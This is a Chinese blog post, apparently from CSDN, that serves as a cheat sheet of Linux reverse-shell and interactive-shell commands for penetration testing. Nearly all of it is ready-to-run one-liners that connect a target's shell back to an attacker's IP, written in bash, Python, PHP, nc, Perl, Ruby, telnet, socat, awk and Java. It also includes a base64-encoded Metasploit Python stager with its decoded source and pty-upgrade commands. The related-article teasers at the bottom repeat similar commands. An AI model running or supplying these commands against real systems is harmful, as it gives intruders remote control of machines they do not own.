Linux下反弹shell和交互式shell命令

最新推荐文章于 2025-04-08 10:40:52 发布
最新推荐文章于 2025-04-08 10:40:52 发布
阅读量2.6w 收藏 14
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wo41ge/article/details/113861532
本文详细介绍了bash、python、php、ruby等多种编程语言在反弹shell中的实战技巧,包括nc、socat、awk等工具的运用,以及msf、pty模块的交互式操作。深入探讨了反弹shell的原理与常见规避方法,适合进阶安全工程师阅读。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

反弹shell

bash反弹shell

接收端:nc -lvvp 端口

发送端:bash -i >& /dev/tcp/接收端IP/接收端端口 0>&1

python反弹shell

1
接收端:nc -lvvp 端口

发送端:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("接收端IP",接收端端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
2
接收端:nc -lvvp 端口

发送端:python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('接收端IP',端口))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
msf版
msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.90.1 LPORT=1234
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))
base64解码
import socket,struct
s=socket.socket(2,1)
s.connect(('192.168.90.1',1234))
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(4096)
while len(d)!=l:
    d+=s.recv(4096)
exec(d,{'s':s})

php反弹shell

接收端:nc -lvvp 端口

发送端:php -r '$sock=fsockopen("接收端IP",接收端端口);exec("/bin/sh -i <&3 >&3 2>&3");'

代码假设TCP连接的文件描述符为3,如果不行可以试下4,5,6

还有 kali自带的php反弹shell (php-reverse-shell.php)也可以

nc反弹shell

接收端:nc -lvvp 端口

发送端:nc 接收端IP 接收端端口 -e /bin/bash 2>&1>/dev/null &

nc 没有-e的参数时

接收端:nc -lvvp 端口

发送端:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 接收端IP 端口 >/tmp/f

简单的解释:

mkfifo 命令首先创建了一个管道,cat 将管道里面的内容输出传递给/bin/sh,sh会执行管道里的命令并将标准输出和标准错误输出结果通过nc 传到该管道,由此形成了一个回路

类似的命令:

mknod backpipe p; nc 接收端IP 端口 0<backpipe | /bin/bash 1>backpipe 2>backpipe

perl反弹shell

接收端:nc -lvvp 端口

发送端:perl -e 'use Socket;$i="接收端IP";$p=接收端端口;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

ruby反弹shell

接收端:nc -lvvp 端口

发送端:ruby -rsocket -e'f=TCPSocket.open("接收端IP",接收端端口).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

talnet反弹shell(nc不可用或/dev/tcp不可用时)

1
接收端:nc -lvvp 端口

发送端:mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe
2
接收端:nc -lvvp 端口1  输入命令

接收端:nc -lvvp 端口2 查看命令执行的结果

发送端:telnet 接收端IP 端口1 | /bin/bash | telnet 接收端IP 端口2

socat反弹shell

接收端:nc -lvvp 端口

发送端:socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:接收端IP:端口

awk反弹shell

接收端:nc -lvvp 端口

awk 'BEGIN{s="/inet/tcp/0/接收端IP/接收端端口";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

java反弹shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/接收端IP/端口;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm

反向外壳的最简单形式之一是xterm会话。以下命令应在服务器上运行。

它将尝试通过TCP端口6001重新连接到您(10.0.0.1)。

xterm -display 10.0.0.1:1

要捕获传入的xterm,请启动X服务器(:1 –侦听TCP端口6001)。一种方法是使用Xnest(在您的系统上运行):

Xnest:1

您需要授权目标连接到您(命令也在主机上运行):

xhost + targetip

交互式shell

python导入pty模块

python -c 'import pty;pty.spawn("/bin/bash")'

socat直接反弹pty交互式shell

攻击机:

socat TCP-LISTEN:端口 -

靶机:

exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:攻击机IP:端口

靶机安装socat二进制文件

https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat

本质

https://xz.aliyun.com/t/2548 Linux反弹shell(一)文件描述符与重定向
https://xz.aliyun.com/t/2549 Linux反弹shell(二)反弹shell的本质

简单的反弹shell到全交互式shell
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
11-01 974
参考文章: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/socat是类Unix系统下的一个工具,可以看作是 nc 的加强版。所以我们可以使用socat来传递完整的带有tty的TCP连接。如何把一个简单的shell就升级到一个标准交互式shell。就可以得到一个完整的交互式shell了,非常方便。另一种 socat 反弹真正交互式Shell。经常我们拿到的shell是一个简单的shell
从非交互式 Shell 到全交互式 Shell反弹 Shell 终端升级全攻略
vortex5的博客
12-26 1608
文章摘要: 在渗透测试中,初始获取的Shell往往是非交互式的,存在命令补全缺失、无法运行交互工具等限制。本文系统分析了三种Shell类型:非交互式(如Netcat反弹)、半交互式(通过Python或script模拟PTY)交互式(完全模拟终端)。重点介绍了从非交互式升级的方法:利用Python的pty.spawn()或script命令创建伪终端,再通过stty设置终端参数、调整环境变量(TERM/SHELL)实现功能强化。其核心原理是通过PTY(伪终端)模拟真实终端的数据流控制信号传输,使Shell
反弹shell
weixin_39430198的博客
03-09 1万+
一、课时目标 1.理解shell的概念 2.理解交互式shell交互式shell的区别 3.掌握反弹shell的原理方法
反弹Shell升级为交互式Shel
weixin_46622976的博客
04-27 1812
前言 经常我们拿到的shell是一个简单的shell 如何把一个简单的shell就升级到一个标准交互式shell 写这篇文章记录一下 正文 攻击机:kali 靶机:ubuntu 普通Shell 给kali弹shell bash -i >& /dev/tcp/192.168.145.128/4444 0>&1 kali:nc -lvvp 4444 然后发现这个shell有很多问题 无法使用vim等文本编辑器 不能补全 不能su 没有向上箭头使用历史 等等 .
Linux反弹shell命令语句解析
Lee_Natuo的博客
12-07 969
Linux反弹shell命令语句 语句格式 bash -i &amp;amp;gt;&amp;amp;amp; /dev/tcp/[ip]/[port] 0&amp;amp;gt;&amp;amp;amp;1 bash -i 打开bash &amp;amp;amp;后面跟 /dev/tcp/[ip]/[port] (相当于&amp;amp;gt;&amp;amp;amp;后面接文件)将bash的标准输出标准错误输出传递到远
LinuxNC反弹shell命令(推荐)
09-15
本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作,并提供其他编程语言的反弹Shell命令作为参考。 首先,攻击者需要在自己的机器上启动一个监听服务来接收目标机器的连接。这通常通过以下`nc`命令完成: ...
linux反弹shell的原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
【不一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识,作者从独特的角度出发,挑战了传统的分类方法,为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术,它涉及被控端...
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 3310
详细讲解Linux反弹shell包含的NC正向shellNC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
交互式shell与非交互式shell反弹shell
mrx56的博客
03-28 1886
交互shell 交互shell就是shell等待你的输入,并且立即执行你提交的命令。 这种模式被称作交互式是因为shell与用户进行交互。 这种模式也是大多数用户非常熟悉的:登录、执行一些命令、签退。当签退后,shell也终止了。 需要进行信息交互,例如输入某个信息 会返回信息 你需要对其输入内容,输入会执行命令。 例如 cmd 终端 msf反弹后门shell nc反弹shell 这些都属于交互shell 非交互shell shell也可以运行在另外一种模式:非交互式模式,以shell script(非交互
渗透测试中反弹shell的27种实战方法全解析,从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
04-08 1418
反弹 shell 技术作为渗透测试领域的关键技能,犹如一把双刃剑,在专业人员手中,它是评估系统安全性、挖掘潜在漏洞的得力工具,能够帮助企业提前发现并修补安全防线的薄弱环节,有效抵御恶意攻击。但倘若落入不法之徒手中,便可能沦为窃取机密信息、破坏系统稳定、实施网络犯罪的凶器,给个人、企业乃至国家带来不可估量的损失。因此,对于广大网络安全从业者而言,深入理解并熟练掌握反弹 shell 技术不仅是提升个人专业素养的必经之路,更是维护网络空间安全稳定的职责所在。
反弹shell总结
weixin_44576725的博客
04-26 4828
反弹shell 在介绍反弹链接的时候先说明什么是正向链接:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。而反弹shell是指攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。本质上是网络概念的客户端与服务端的角色反转。反弹shell简单来说就是通过命令让靶机的shell的控制权交到攻击者的机器中。 可能有人会问:我们都能够在靶机
常见的反弹shell的方法以及对反弹shell的解释
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
Windows的几种常用反弹shell方法
热门推荐
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell
09-06 2840
Cobalt StrikeMsf(Metasploit)之间的相互派生shell。完整的记录了Windows系统被控主机的cs与msf互相反弹shellLinux系统被控主机的反弹shell给cscs上的Linux主机反弹shell给msf。
常用的反弹shell总结
西部壮仔的博客
03-24 1660
nc反弹shell 我们已经拿下主机的一个webshell,我们想获取一个可以直接操作主机的虚拟终端,此时我们首先想到的是开启一个shell监听,这种场景比较简单,我们直接使用使用nc即可开启,如果没有nc我们也可以很轻松的直接下载安装一个,具体开启监听的命令如下。 这里需要注意一点默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接...
linux反弹shell简单使用
2301_78006725的博客
02-24 966
nc -e /bin/bash [靶机ip] [靶机监听端口]反弹成功后需要将反弹shell升级为交互shellnc -lvvp [任意未占用的端口号]一、反弹shellNC正向反弹)2、攻击机将shell弹到靶机上。1、靶机开启监听端口。
渗透测试中反弹shell的27种实战方法全解析
互联网环境恶劣,现在积极的想从事网络安全行业
01-06 1387
反弹 shell 技术作为渗透测试领域的关键技能,犹如一把双刃剑,在专业人员手中,它是评估系统安全性、挖掘潜在漏洞的得力工具,能够帮助企业提前发现并修补安全防线的薄弱环节,有效抵御恶意攻击。但倘若落入不法之徒手中,便可能沦为窃取机密信息、破坏系统稳定、实施网络犯罪的凶器,给个人、企业乃至国家带来不可估量的损失。因此,对于广大网络安全从业者而言,深入理解并熟练掌握反弹 shell 技术不仅是提升个人专业素养的必经之路,更是维护网络空间安全稳定的职责所在。
windows反弹shell复现
就是我的博客
04-06 1万+
windows反弹shell 简介: reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值